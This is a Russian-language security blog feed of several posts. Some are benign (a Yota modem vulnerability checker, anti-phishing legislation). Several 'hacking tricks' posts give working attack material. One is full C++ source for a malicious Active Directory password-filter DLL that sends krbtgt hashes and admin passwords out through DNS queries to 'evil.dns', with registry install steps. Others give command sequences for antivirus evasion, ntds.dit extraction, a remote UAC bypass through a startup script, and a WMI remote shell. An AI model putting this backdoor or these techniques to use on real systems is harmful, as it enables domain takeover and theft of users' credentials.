В тему ИБ

Сплоетс на миллион

noreply@blogger.com (Dmitry Evteev) — Fri, 27 Nov 2015 14:13:00 +0300

Для всех пользователей LTE модемов компании Yota (к котором в т.ч. относится и Ваш покорный слуга) компания HeadLight Security запустила бесплатный онлайн сервис по проверке наличия известных уязвимостей в решениях этой телекоммуникационной компании. Проверить свой компьютер можно по следующей ссылке – http://yota.hlsec.ru/

Наиболее опасная уязвимость, которая содержится в распространяемом ПО вместе с самим LTE-модемом, позволяет выполнить произвольное приложение на уязвимой системе. Эксплоит является кроссплатформенным и затрагивает операционные системы на базе Windows и MacOS. Условия проведения атаки можно сравнить, например, с пруфом Tavis Ormandy, который позволял провести RCE в отношении компьютера с установленным антивирусом Касперского, т.е. достаточно просто посетить определенный "заряженный" веб-сайт. В свое время аналогичными уязвимостями отличились и антивирус Avast [тынц], и антивирус компании ESET [брякс].

Обновление от производителя в настоящее время отсутствует. В качестве workaround можно на время (до выхода соотвествующего обновления) удалить софт от Yota, поставляемого вместе с LTE свистелкой. Это не повлияет на работу в интернете, но защитит компьютер от RCE.

Противодействие фишингу на государственном уровне

noreply@blogger.com (Dmitry Evteev) — Thu, 29 Oct 2015 18:17:00 +0300

Сегодня ваш покорный слуга принял участие в обсуждении нового законопроекта о введении уголовного наказания за фишинговые сайты (расширение Главы 28 УК РФ. Преступления в сфере компьютерной информации). За выделенные мне 10 минут постарался донести до законотворцев мысль о том, что существует рынок консалтинговых услуг в сфере информационной безопасности. И, в связи с инициативой депутата госдумы Ильи Костунова о новом законе, необходимо сохранить социотехнические тесты в правовом поле.

Противодействие хищению персональных данных и платежной информации в сети Интернет посредством фишинга from Dmitry Evteev

penetest VS. APT

noreply@blogger.com (Dmitry Evteev) — Sun, 4 Oct 2015 11:11:00 +0300

После многострадального квеста в российского предпринимателя ваш покорный слуга вновь погружается в привычное ему амплуа. Так, погружение состоялось на площадке DEFCON MOSCOW 0X0A #DC7499, где наравне с Сергеем Головановым и Никитой Кислициным я поднял популярную нынче тему APT. К слову, оставшуюся программу мероприятия, практически всецело, заняли мои коллеги по текущей работе - Олег Купреев и Михаил Фирстов (разумеется помимо выступления великого человека Дмитрия Недоспасова). С моей презентацией можно ознакомиться ниже, презентации других участников встречи, насколько я понимаю, появятся чуть позже на сайте мероприятия.

penetest VS. APT from Dmitry Evteev

[hacking tricks] AVs bypass

noreply@blogger.com (Dmitry Evteev) — Sun, 4 May 2014 19:42:00 +0400

Не все ~~помнят~~ знают, что командная строка Windows воспринимает любой файл с произвольным расширением, как исполняемую PE-программу. Это в свою очередь может с успехом использоваться для обхода превентивных механизмов защиты. В качестве примера возьмем известный по virustotal Passwords Stealer UFR [тынц] и не безызвестный антивирус McAfee, который уже знает про эту стягивалку паролей [PWS-FAPK!31754313CD59]. Создадим новый билд UFR Stealer и сразу же переименуем его, например так: C:\Temp> move test.exe test.db

Теперь любым волшебным способом доставим исполняемый файл test.db на целевой компьютер, на котором уже крутится антивирус McAfee и...

Аналогичным образом обходятся и другие аверы в т.ч. антивирус Касперского, а вот родной для винды Windows Defender такие особенности командной строки блюдет(( радует лишь то, что дефендер не перегружен знаниями о самой малвари))

[hacking tricks] Полноценный WMI shell

noreply@blogger.com (Dmitry Evteev) — Sat, 26 Apr 2014 00:41:00 +0400

Усилиями Andrei Dumitrescu появился полноценный WMI шелл на Python. Тула разработана в контексте выступления Andrei's на проходящем сейчас мероприятии #HES2014 [http://2014.hackitoergosum.org/].

Ознакомиться с презентацией можно по следующей ссылке [тынц].

root@bt:/tmp# wget https://www.lexsi.fr/conference/wmi-shell.zip
root@bt:/tmp# unzip wmi-shell.zip
Archive: wmi-shell.zip
creating: wmi-shell/
inflating: wmi-shell/LICENSE
inflating: wmi-shell/wmi-shell.py
inflating: wmi-shell/README
inflating: wmi-shell/base.vbs
creating: wmi-shell/bin/
inflating: wmi-shell/bin/base64.c
inflating: wmi-shell/bin/base64.exe
inflating: wmi-shell/bin/wmis
inflating: wmi-shell/bin/wmic
creating: wmi-shell/b64-source/
inflating: wmi-shell/b64-source/base64.exe
inflating: wmi-shell/b64-source/base64.c
root@bt:/tmp# cd wmi-shell/
root@bt:/tmp/wmi-shell# python wmi-shell.py administrator password 10.1.37.134
Sending our VBS script to 10.1.37.134 ETA: ~6.4 seconds.
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c echo Function base64_encode( byVal strIn ) >>%TEMP%\E2BpK7z.vbs" 2>/dev/null <-- . Returned code: 1
...
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c echo End Select >>%TEMP%\E2BpK7z.vbs" 2>/dev/null <-- . Returned code: 1
>>> dir C:\\
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c cscript %TEMP%\E2BpK7z.vbs \"dir C:\\\"" 2>/dev/null <-- . Returned code: 1
Executed command --> ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'DOWNLOAD_READY'" > bSKFiy5_ready.tmp <-- . Returned code: 0
waiting for command output . . Executed command --> ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'DOWNLOAD_READY'" > bSKFiy5_ready.tmp <-- . Returned code: 0
. done !
Executed command --> ./bin/wmic -U "administrator"%"password" //10.1.37.134 --namespace='root\default' "select Name from __Namespace where Name like 'EVILTAG%'" > bSKFiy5.tmp <-- . Returned code: 0
Volume in drive C has no label.
Volume Serial Number is 8E25-9E63

Directory of C:\

14.07.2009 07:20 <DIR> PerfLogs
19.04.2014 03:12 <DIR> Program Files
19.04.2014 22:04 <DIR> Program Files (x86)
19.04.2014 03:05 <DIR> Users
20.04.2014 04:19 <DIR Windows
0 File(s) 0 bytes
5 Dir(s) 82▒326▒290▒432 bytes free
Executed command --> ./bin/wmis -U "administrator"%"password" //10.1.37.134 "cmd /c cscript %TEMP%\E2BpK7z.vbs \"cleanup\"" 2>/dev/null <-- . Returned code: 1
>>>

[hacking tricks] Easy way to get a ntds.dit

noreply@blogger.com (Dmitry Evteev) — Sat, 12 Apr 2014 14:40:00 +0400

Все секреты Active Directory как известно хранятся в одном единственном файлике NTDS.DIT, который представляет из себя специально разработанную компанией Microsoft базу данных. Для получения копии этой базы варварским способом может использоваться механизм теневых копий. Почему варварским? Да потому, что в момент создания теневой копии в базе могут выполняться различные транзакции, что несколько повлияет на целостность полученной копии. Но начиная с Windows 2008 корпорация добра расширила возможности утилиты Ntdsutil, что позволяет стащить базу NTDS.DIT с работающей системы не повредив ее при этом. Раньше применение утилиты Ntdsutil ограничивалось режимом восстановления контроллера домена.

Спасибо за находку @obscuresec!!

Microsoft Windows [Версия 6.0.6001]
(C) Корпорация Майкрософт, 2006. Все права защищены.

C:\Windows\system32>ntdsutil "ac in ntds" "ifm" "cr fu c:\Windows\Temp\abc" q q

ntdsutil: ac in ntds
Активный экземпляр - "ntds".
ntdsutil: ifm
IFM: cr fu c:\Windows\Temp\abc
Создание снимка...
Успешно создан набор снимков {8d6cf811-ccd4-4dbe-9190-b911bb96196a}.
Снимок {f31648c2-0afd-4c5d-bd05-54e42debe6f1} установлен как C:\$SNAP_2014041214
02_VOLUMEC$\
Снимок {f31648c2-0afd-4c5d-bd05-54e42debe6f1} уже подключен.
Запуск режима ДЕФРАГМЕНТАЦИИ...
Исходная база данных: C:\$SNAP_201404121402_VOLUMEC$\Windows\NTDS\ntds.dit
Конечная база данных: c:\Windows\Temp\abc\Active Directory\ntds.dit

Defragmentation Status (% complete)

0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................

Копирование файлов реестра...
Копирование c:\Windows\Temp\abc\registry\SYSTEM
Копирование c:\Windows\Temp\abc\registry\SECURITY
Снимок {f31648c2-0afd-4c5d-bd05-54e42debe6f1} отключен.
Носитель IFM успешно создан в c:\Windows\Temp\abc
IFM: q
ntdsutil: q

C:\Windows\system32>

Binary backdoor in Active Directory :: Stealing passwords

noreply@blogger.com (Dmitry Evteev) — Thu, 10 Apr 2014 03:22:00 +0400

До сегодняшнего дня я писал только про бэкдоры в AD на уровне приложения [1, 2, 3, 4, 5]. Подобные закладки интересны в первую очередь тем, что они имеют высокую степень живучести за счет того, что присутствуют в реплике Active Directory. Такие закладки могут пережить даже смутные времена disaster recovery, после признания админами факта компрометации AD. Но обладая привилегиями системы на контроллерах домена, появляются иные способы сохранить свое незримое присутствие не доводя админов до белого колена. Одному из таких способов и посвящена данная публикация.

В далекие времена смены шкурок формы ввода логинов и паролей (аля gina.dll) нашлись умельцы, которые приспособили эту возможность винды для аккуратного складирования используемых креденшелов в текстовый файлик (ссылка). Серьезным ограничением данного подхода являлось то, что атакующему требовалось заменить джину на всех компутерах, на которых хотелось пособирать заветные пароли. Соответственно сам перехват осуществляется в момент ввода логина и пароля.

В настоящие же дни, Microsoft, понимая, что с джиной хакерам не катит, предлагает использовать хук PasswordChangeNotify, который будучи подгруженный в LSASS на контроллере домена, позволяет собирать стабильный урожай в виде паролей пользователей домена. На эту функциональность собственно и обратил внимание Rob Fuller aka @mubix. Так появился следующий пруф, который тут же был подхвачен сообществом [тынц, тынц].

В целом можно собрать код @mubix и использовать получившуюся dll'ль для различного рода благих целей. Но этот пруф не подходит для длительного плодотворного использования. Представляете, как удивится администратор адешечки, когда сетевой администратор покажет ему логи корпоративного прокси-сервера? Хотелось бы видеть мимику его лица, но в самом начале я уже говорил, что сегодня доводить до седины админов мы не станем.

Размышляя на тему того, как максимально эффективно можно воспользоваться наработками @mubix у меня появились следующие мысли:

складировать пароли где-то в дебрях sysvol (отличное хранилище, но требует прав доменного пользователя и сетевого доступа к контроллеру домена при стягивании полезных данных)
складировать пароли где-то в дебрях каталога ldap (аналогично недостаткам с sysvol)
-//- где-то в dns-зоне домена (интересное решение, т.к. находятся такие умники, которые вывешивают внутренние dns-зоны в Ынтернет; с другой стороны весьма палевный способ)
тупо отдавать рекурсивно пароли по dns (…бинго!)

Кроме того, нам не нужны креды ВСЕХ пользователей домена, достаточно хешика krbtgt и 2-3 актуальных паролей админов, которым можно ходить на Citrix и/или VPN.

Так появился следующий код:

#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
#include <ntsecapi.h> 
#include <string>
#include <algorithm>
using namespace std;

//**********************************************
//Init values
#define INIT_A 0x67452301
#define INIT_B 0xefcdab89
#define INIT_C 0x98badcfe
#define INIT_D 0x10325476
#define SQRT_2 0x5a827999
#define SQRT_3 0x6ed9eba1

unsigned int nt_buffer[16];
unsigned int output[4];
char itoa16[17] = "0123456789ABCDEF";

char ntlmhash[33];
//**********************************************

// http://www.codeproject.com/Articles/328761/NTLM-Hash-Generator
void NTLM(PWSTR key, USHORT sizekey)
{
    //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    // Prepare the string for hash calculation
    //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    int i = 0;
 int length = sizekey;
    memset(nt_buffer, 0, 16*4);
    //The length of key need to be <= 27
    for(; i<length/2; i++)   
        nt_buffer[i] = key[2 * i] | (key[2 * i + 1] << 16);
  
    //padding
    if(length % 2 == 1)
        nt_buffer[i] = key[length - 1] | 0x800000;
    else
        nt_buffer[i] = 0x80;
    //put the length
    nt_buffer[14] = length << 4;
    //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    // NTLM hash calculation
    //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    unsigned int a = INIT_A;
    unsigned int b = INIT_B;
    unsigned int c = INIT_C;
    unsigned int d = INIT_D;
  
    /* Round 1 */
    a += (d ^ (b & (c ^ d)))  +  nt_buffer[0]  ;a = (a << 3 ) | (a >> 29);
    d += (c ^ (a & (b ^ c)))  +  nt_buffer[1]  ;d = (d << 7 ) | (d >> 25);
    c += (b ^ (d & (a ^ b)))  +  nt_buffer[2]  ;c = (c << 11) | (c >> 21);
    b += (a ^ (c & (d ^ a)))  +  nt_buffer[3]  ;b = (b << 19) | (b >> 13);
  
    a += (d ^ (b & (c ^ d)))  +  nt_buffer[4]  ;a = (a << 3 ) | (a >> 29);
    d += (c ^ (a & (b ^ c)))  +  nt_buffer[5]  ;d = (d << 7 ) | (d >> 25);
    c += (b ^ (d & (a ^ b)))  +  nt_buffer[6]  ;c = (c << 11) | (c >> 21);
    b += (a ^ (c & (d ^ a)))  +  nt_buffer[7]  ;b = (b << 19) | (b >> 13);
  
    a += (d ^ (b & (c ^ d)))  +  nt_buffer[8]  ;a = (a << 3 ) | (a >> 29);
    d += (c ^ (a & (b ^ c)))  +  nt_buffer[9]  ;d = (d << 7 ) | (d >> 25);
    c += (b ^ (d & (a ^ b)))  +  nt_buffer[10] ;c = (c << 11) | (c >> 21);
    b += (a ^ (c & (d ^ a)))  +  nt_buffer[11] ;b = (b << 19) | (b >> 13);
  
    a += (d ^ (b & (c ^ d)))  +  nt_buffer[12] ;a = (a << 3 ) | (a >> 29);
    d += (c ^ (a & (b ^ c)))  +  nt_buffer[13] ;d = (d << 7 ) | (d >> 25);
    c += (b ^ (d & (a ^ b)))  +  nt_buffer[14] ;c = (c << 11) | (c >> 21);
    b += (a ^ (c & (d ^ a)))  +  nt_buffer[15] ;b = (b << 19) | (b >> 13);
  
    /* Round 2 */
    a += ((b & (c | d)) | (c & d)) + nt_buffer[0] +SQRT_2; a = (a<<3 ) | (a>>29);
    d += ((a & (b | c)) | (b & c)) + nt_buffer[4] +SQRT_2; d = (d<<5 ) | (d>>27);
    c += ((d & (a | b)) | (a & b)) + nt_buffer[8] +SQRT_2; c = (c<<9 ) | (c>>23);
    b += ((c & (d | a)) | (d & a)) + nt_buffer[12]+SQRT_2; b = (b<<13) | (b>>19);
  
    a += ((b & (c | d)) | (c & d)) + nt_buffer[1] +SQRT_2; a = (a<<3 ) | (a>>29);
    d += ((a & (b | c)) | (b & c)) + nt_buffer[5] +SQRT_2; d = (d<<5 ) | (d>>27);
    c += ((d & (a | b)) | (a & b)) + nt_buffer[9] +SQRT_2; c = (c<<9 ) | (c>>23);
    b += ((c & (d | a)) | (d & a)) + nt_buffer[13]+SQRT_2; b = (b<<13) | (b>>19);
  
    a += ((b & (c | d)) | (c & d)) + nt_buffer[2] +SQRT_2; a = (a<<3 ) | (a>>29);
    d += ((a & (b | c)) | (b & c)) + nt_buffer[6] +SQRT_2; d = (d<<5 ) | (d>>27);
    c += ((d & (a | b)) | (a & b)) + nt_buffer[10]+SQRT_2; c = (c<<9 ) | (c>>23);
    b += ((c & (d | a)) | (d & a)) + nt_buffer[14]+SQRT_2; b = (b<<13) | (b>>19);
  
    a += ((b & (c | d)) | (c & d)) + nt_buffer[3] +SQRT_2; a = (a<<3 ) | (a>>29);
    d += ((a & (b | c)) | (b & c)) + nt_buffer[7] +SQRT_2; d = (d<<5 ) | (d>>27);
    c += ((d & (a | b)) | (a & b)) + nt_buffer[11]+SQRT_2; c = (c<<9 ) | (c>>23);
    b += ((c & (d | a)) | (d & a)) + nt_buffer[15]+SQRT_2; b = (b<<13) | (b>>19);
  
    /* Round 3 */
    a += (d ^ c ^ b) + nt_buffer[0]  +  SQRT_3; a = (a << 3 ) | (a >> 29);
    d += (c ^ b ^ a) + nt_buffer[8]  +  SQRT_3; d = (d << 9 ) | (d >> 23);
    c += (b ^ a ^ d) + nt_buffer[4]  +  SQRT_3; c = (c << 11) | (c >> 21);
    b += (a ^ d ^ c) + nt_buffer[12] +  SQRT_3; b = (b << 15) | (b >> 17);
  
    a += (d ^ c ^ b) + nt_buffer[2]  +  SQRT_3; a = (a << 3 ) | (a >> 29);
    d += (c ^ b ^ a) + nt_buffer[10] +  SQRT_3; d = (d << 9 ) | (d >> 23);
    c += (b ^ a ^ d) + nt_buffer[6]  +  SQRT_3; c = (c << 11) | (c >> 21);
    b += (a ^ d ^ c) + nt_buffer[14] +  SQRT_3; b = (b << 15) | (b >> 17);
  
    a += (d ^ c ^ b) + nt_buffer[1]  +  SQRT_3; a = (a << 3 ) | (a >> 29);
    d += (c ^ b ^ a) + nt_buffer[9]  +  SQRT_3; d = (d << 9 ) | (d >> 23);
    c += (b ^ a ^ d) + nt_buffer[5]  +  SQRT_3; c = (c << 11) | (c >> 21);
    b += (a ^ d ^ c) + nt_buffer[13] +  SQRT_3; b = (b << 15) | (b >> 17);
  
    a += (d ^ c ^ b) + nt_buffer[3]  +  SQRT_3; a = (a << 3 ) | (a >> 29);
    d += (c ^ b ^ a) + nt_buffer[11] +  SQRT_3; d = (d << 9 ) | (d >> 23);
    c += (b ^ a ^ d) + nt_buffer[7]  +  SQRT_3; c = (c << 11) | (c >> 21);
    b += (a ^ d ^ c) + nt_buffer[15] +  SQRT_3; b = (b << 15) | (b >> 17);
  
    output[0] = a + INIT_A;
    output[1] = b + INIT_B;
    output[2] = c + INIT_C;
    output[3] = d + INIT_D;
    //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    // Convert the hash to hex (for being readable)
    //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    for(i=0; i<4; i++)
    {
        int j = 0;
        unsigned int n = output[i];
        //iterate the bytes of the integer      
        for(; j<4; j++)
        {
            unsigned int convert = n % 256;
            ntlmhash[i * 8 + j * 2 + 1] = itoa16[convert % 16];
            convert = convert / 16;
            ntlmhash[i * 8 + j * 2 + 0] = itoa16[convert % 16];
            n = n / 256;
        }   
    }
    //null terminate the string
    ntlmhash[33] = 0;
}
//**********************************************

void nsping(char * host)
{

    WSADATA wsaData;
    int iResult;

    struct hostent *remoteHost;
    char *host_name;

    // Initialize Winsock
    iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (iResult == 0) {
  host_name = host;
  remoteHost = gethostbyname(host_name);
    }
}

// Default DllMain implementation
BOOL APIENTRY DllMain( HANDLE hModule, 
                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
        case DLL_PROCESS_ATTACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}
 
BOOLEAN __stdcall InitializeChangeNotify(void)
{
    return TRUE;
}
 
BOOLEAN __stdcall PasswordFilter(
    PUNICODE_STRING AccountName,
    PUNICODE_STRING FullName,
    PUNICODE_STRING Password,
    BOOLEAN SetOperation )
{
    return TRUE;
}
 
NTSTATUS __stdcall PasswordChangeNotify(
    PUNICODE_STRING UserName,
    ULONG RelativeId,
    PUNICODE_STRING NewPassword )
{

  boolean debug = FALSE;

  if (debug)
  {
 FILE* pFile = fopen("c:\\windows\\temp\\pw.tmp", "a+");
 if (NULL != pFile)
 {
   fprintf(pFile, "\r\nUser: %ws", UserName->Buffer);
   fprintf(pFile, "\r\nPassword: %ws", NewPassword->Buffer);
   fprintf(pFile, "\r\nHex: ");

   for (USHORT i = 0; i < (NewPassword->Length / 2); i++) 
   {
  fprintf(pFile, "%x ",NewPassword->Buffer[i]);
   }
   fclose(pFile);
 }
  }

  //--- nslookup

  char buffUser[100];
  sprintf(buffUser, "%ws", UserName->Buffer);
  std::string strUser(buffUser);
  std::transform(strUser.begin(), strUser.end(), strUser.begin(), ::tolower);

  if (strUser.find("krbtgt")==0)
  {
 char hostname[255];
 NTLM(NewPassword->Buffer,(NewPassword->Length / 2));
 sprintf(hostname,"%s.krbtgt.evil.dns",ntlmhash);
 nsping(hostname);
  }
  else if (strUser.find("admin")!=-1 || strUser.find("admn")!=-1)
  {
    char hostname[255];
 std::string tmppw, tmpusr;
    tmppw.reserve( NewPassword->Length * 2 );
 tmpusr.reserve( UserName->Length * 2 );

 for (USHORT i = 0; i < (UserName->Length / 2); i++) 
 {
   sprintf((char*)tmpusr.c_str(), "%s%x-",tmpusr.c_str(),UserName->Buffer[i]);
    }

 sprintf((char*)tmpusr.c_str(), "%susr",tmpusr.c_str());

 for (USHORT i = 0; i < (NewPassword->Length / 2); i++) 
 {
   sprintf((char*)tmppw.c_str(), "%s%x-",tmppw.c_str(),NewPassword->Buffer[i]);
    }

 sprintf((char*)tmppw.c_str(), "%spwd",tmppw.c_str());

 string tmpbuffpw = tmppw.c_str();
 string tmpbuffusr = tmpusr.c_str();

 for (USHORT i = 0; i < tmpbuffpw.length(); i=i+63) 
 {
   sprintf(hostname,"%s.%s.evil.dns",(tmpbuffpw.substr ( i , 63 )).c_str(),(tmpbuffusr.substr ( 0 , 63 )).c_str());
   nsping(hostname);
 }

  }

  //---

  return 0;
}

Инсталляция:

1. На всех контроллерах домена (вне зависимости от их роли!) прописаться в качестве password-фильтра

reg query HKLM\System\CurrentсontrolSet\Control\Lsa /v "Notification Packages"

reg add HKLM\System\CurrentcontrolSet\Control\Lsa /v "Notification Packages" /t REG_MULTI_SZ /d scecli\0RASSFM\0evilpassfilter /f

2. Зарегистрировать dns-имя и на ns-сервере поднять, например, msf fakedns

msf > use auxiliary/server/fakedns

msf auxiliary(fakedns) > run

3. Сребутать все котроллеры домена 8)

ЗЫ. clymb3r в свое время сумел подгрузить password-фильтр без ребута системы, однако у мну эта магия не взлетела(( стукнитесь, если у кого получится.

Для экспериментов можно использовать следующие сборки [evilpassfilter.dll, evilpassfilter_x64.dll]. Данные билды никуда не пересылают пароли, а только лишь аккуратно складывают их в файлик c:\windows\temp\pw.tmp

MD5 (evilpassfilter.dll) = d9d210c382155a9f50e051a1a3a9d5a6

MD5 (evilpassfilter_x64.dll) = ac53dc59933d0ce6ef6058fc1340caef

CVE-2014-0160 Рабочий сплоит

noreply@blogger.com (Dmitry Evteev) — Tue, 8 Apr 2014 19:22:00 +0400

Этот эксплоит сделал мой день 8))

https://gist.github.com/andresriancho/10135096
https://bitbucket.org/johannestaas/heartattack/src

Полезный патч на сплоит от d0znpp: http://lab.onsec.ru/2014/04/memory-dumper-based-on-cve-2014-0160.html

+1 Heartbleed User Session Extraction: http://packetstormsecurity.com/files/126069/Heartbleed-User-Session-Extraction.html
+1 HackerFantastic: https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c
+1 http://didierstevens.com/files/data/heartbleed_packet_capture.zip

+1 http://foxitsecurity.files.wordpress.com/2014/04/fox_heartbleedtest.zip

NMAP NSE: http://seclists.org/nmap-dev/2014/q2/att-27/ssl-heartbleed.nse
MSF: https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb

Чекалка уязвимости (online):
http://filippo.io/Heartbleed/ ИЛИ http://possible.lv/tools/hb/
Более продвинутая чекалка (SSL в целом и CVE-2014-0160 в частности) от Qualys: https://www.ssllabs.com/ssltest/

Heartbleed Honeypot Script: http://packetstormsecurity.com/files/126068
Detect heartbleed attacks with tshark [1]: tshark -i eth0 -R "ssl.record.content_type eq 24 and not ssl.heartbeat_message.type"

Search for processes still using old OpenSSL #heartbleed : grep -l 'libssl.*deleted' /proc/*/maps | tr -cd 0-9\\n | xargs -r ps u

Ссылки:

http://www.techworm.net/2014/04/zero-day-open-ssl-vulnerability.html

http://www.xakep.ru/post/62329

http://habrahabr.ru/post/218609/

http://www.us-cert.gov/ncas/alerts/TA14-098A
https://github.com/musalbas/heartbleed-masstest/blob/master/top10000.txt
http://blogs.cisco.com/security/openssl-heartbleed-vulnerability-cve-2014-0160-cisco-products-and-mitigations/
https://community.qualys.com/blogs/qualys-tech/2014/04/09/heartbleed-detection-update

[hacking tricks] LocalAccountTokenFilterPolicy bypass

noreply@blogger.com (Dmitry Evteev) — Mon, 31 Mar 2014 02:13:00 +0400

Скверный для хакера параметр безопасности винды LocalAccountTokenFilterPolicy, появившийся со времен Windows Vista, отвечает за функциклирование удаленного ограничения UAC. Это такая штука, которая фильтрует наличие привилегий админстратора по сети в отношении всех локальных пользователей системы, которые входят в группу "Администраторы". То есть, все локальные администраторы, кроме дефолтового админа с SID 500, не смогут воспользоваться интерфейсами удаленного администрирования (SMB, RPC, ...) до тех пор пока данный механизм безопасности включен. Но я кажется нашел алгоритм обхода и он основан не на подключении по RDP :)

Предлагаемый способ основан на том, что в конфигурациях по умолчанию современных Windows систем для конечных пользователей хитрым образом шарится папочка "C:\Users", содержащая профили пользователей. Я думаю, что уже после этой фразы стал очевиден сценарий атаки при наличии идентификатора и пароля пользователя, которого удаленная система не желает воспринимать в качестве администратора. Значит экзекнуться в подобной ситуации уже реально, остается лишь разобраться с локальным UAC, чтобы стать полноценным администратором системы.

Для обхода локальных ограничений безопасности UAC можно воспользоваться наработками Leo Davidson, которые затем переконтовали в удобную консольную тулу [забрать]. Стоит лишь добавить, что метод обхода локального UAC работает также и на Windows 8 со всеми обновлениями безопасности на сегодняшний день.

Microsoft Windows [Версия 6.0.6001]
(C) Корпорация Майкрософт, 2006. Все права защищены.

C:\Temp>net use \\RHOST\ADMIN$ /u:rhost\admin password
Системная ошибка 5.
Отказано в доступе.

C:\Temp>wmic /node:RHOST /user:rhost\admin /password:password process call create "cmd.exe /c ipconfig"
ERROR:
Code = 0x80070005
Description = Отказано в доступе.
Facility = Win32

C:\Temp>net use \\RHOST\ipc$ /u:rhost\admin password
Команда выполнена успешно.

C:\Temp>net view \\RHOST /all
Общие ресурсы на \\RHOST

Имя общего ресурса Тип Используется как Комментарий
-------------------------------------------------------------------------------
ADMIN$ Диск Удаленный Admin
C$ Диск Стандартный общий ресурс
IPC$ IPC (UNC) Удаленный IPC
Users Диск
Команда выполнена успешно.

C:\Temp>dir \\RHOST\Users
Том в устройстве \\RHOST\Users не имеет метки.
Серийный номер тома: 5EE0-B619

Содержимое папки \\RHOST\Users

30.03.2014 20:07 <DIR> .
30.03.2014 20:07 <DIR> ..
30.03.2014 20:00 <DIR> admin
30.03.2014 18:10 <DIR> Public
0 файлов 0 байт
4 папок 6 799 081 472 байт свободно

C:\Temp>dir "\\RHOST\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Том в устройстве \\RHOST\Users не имеет метки.
Серийный номер тома: 5EE0-B619

Содержимое папки \\RHOST\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

30.03.2014 23:34 <DIR> .
30.03.2014 23:34 <DIR> ..
0 файлов 0 байт
2 папок 6 799 081 472 байт свободно

C:\Temp>copy /Y bypassuac.exe \\RHOST\Users\admin\AppData\Local\Temp\
Скопировано файлов: 1.

C:\Temp>type logon.vbs
On Error Resume Next
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "C:\Users\admin\AppData\Local\Temp\bypassuac.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f",0,true
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFile "C:\Users\admin\AppData\Local\Temp\bypassuac.exe",true
objFSO.DeleteFile "C:\Users\admin\AppData\Local\Temp\tior.exe",true
objFSO.DeleteFile Wscript.ScriptFullName,true

C:\Temp>copy /Y logon.vbs "\\RHOST\Users\admin\AppData\Roaming\Microsoft\Wi
ndows\Start Menu\Programs\Startup\"
Скопировано файлов: 1.

C:\Temp>net use \\RHOST\ipc$ /del
\\RHOST\ipc$ успешно удален.

C:\Temp> /* WAIT WAIT
C:\Temp> /* logoff/login user */
C:\Temp> WAIT */

C:\Temp>net use \\RHOST\ADMIN$ /u:rhost\admin password
Команда выполнена успешно.

C:\Temp>wmic /node:RHOST /user:rhost\admin /password:password process cal
l create "cmd.exe /c ipconfig"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 4320;
ReturnValue = 0;
};

C:\Temp>

[hacking tricks] Exec via RPC with output

noreply@blogger.com (Dmitry Evteev) — Fri, 28 Mar 2014 04:59:00 +0400

Иногда бывают такие ситуации, когда на удаленном хосте под управлением операционной системы Windows (выше 9x)) файрволом прикрыты все управляющие порты (SMB, WinRM, RDP, etc) кроме 135/tcp RPC. И вот вроде бы и нужные права имеются, и даже удаленный exec отрабатывает, но ходишь вокруг такой машины, как слепой котенок, облизываешься, в надежде, что msf multi/handler выдаст заветное приглашение. Пора прозреть!

Предлагаемый мною способ прост как две копейки и основан на возможности работы с реестром через WMI (к слову, служба удаленного реестра тут не используется). Пруф ниже.

ЗЫ: концепт схож с подходом, используемым парнями из DSEC при выполнении команд через Quick Console в Lotus Domino.

C:\>net use \\RHOST\C$
Системная ошибка 67.
Не найдено сетевое имя.

C:\>wmic /node:RHOST /user:administrator /password:password process call create "cmd.exe /c ipconfig > C:\Windows\Temp\cmd.out"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 2648;
ReturnValue = 0;
};

C:\>wmic /node:RHOST /user:administrator /password:password process call create "cmd.exe /c for /F \"tokens=*\" %A in (C:\Windows\Temp\cmd.out) do @reg ADD HKLM\Software\temp /f /v \"%A\" /t REG_SZ /d \"\""
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 2760;
ReturnValue = 0;
};

C:\>Wmic /node:RHOST /user:administrator /password:password /namespace:\\root\default class stdregprov call EnumValues ^&h80000002,"SOFTWARE\temp"
Executing (stdregprov)->EnumValues()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ReturnValue = 0;
sNames = {"Настройка протокола IP для Windows", "Ethernet adapter Ethern
et0:", "DNS-суффикс подключения . . . . . :", "Локальный IPv6-адрес канала . . .
: fe80::b0ae:a410:4089:21f5%12", "IPv4-адрес. . . . . . . . . . . . : 172.30.0.
